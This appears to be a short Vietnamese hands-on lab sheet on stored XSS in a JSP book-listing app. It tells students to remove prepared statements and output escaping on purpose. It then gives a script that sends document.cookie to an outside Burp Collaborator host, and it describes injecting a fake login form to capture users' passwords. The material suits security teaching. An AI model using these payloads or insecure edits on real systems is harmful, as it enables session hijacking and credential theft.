Professional Documents
Culture Documents
TH C Hành Khai Thác L H NG Stored XSS
TH C Hành Khai Thác L H NG Stored XSS
1. Sửa code chức năng them mới sách, để có thể nhập đoạn mã sau vào ô textbox:
script>alert("XSS attack!");</script>
sau khi mở danh sách cuốn sách, đoạn mã trên được kích hoạt
Sửa code:
Ko dùng preparedstatement
Ko dùng thẻ <c:out> thay bằng dùng trực tiếp JSP EL
<c:out value='${book.id}' />
Chuyển thành:
${book.id}
2. Dùng đoạn mã JS sau để lấy thông tin cookie và gửi về một trang Wait.jsp đang đợi (xem
bài thực hành Dom Based XSS) >> Nhiều trình duyệt đã ko cho thực hiện lệnh
document.cookie
3. <script>
4. const collaboratorPayload =
5. 'https://8nwt4pscq72lffvjuamlfulvtmzcn1.burpcollaborator.net';
6. const url = `${collaboratorPayload}?abc=${document.cookie}`;
7. fetch(url, {
8. method: 'GET',
9. mode: 'no-cors',
10. });
11. </script>
3. Tạo ra 1 input text để nhập username và input text để nhập password, đợi cho 1 stupid
user nào đó nhập username và password của họ vào và khi xong xuôi thì hacker sẽ nhận
được đầy đủ thông tin đăng nhập của người dùng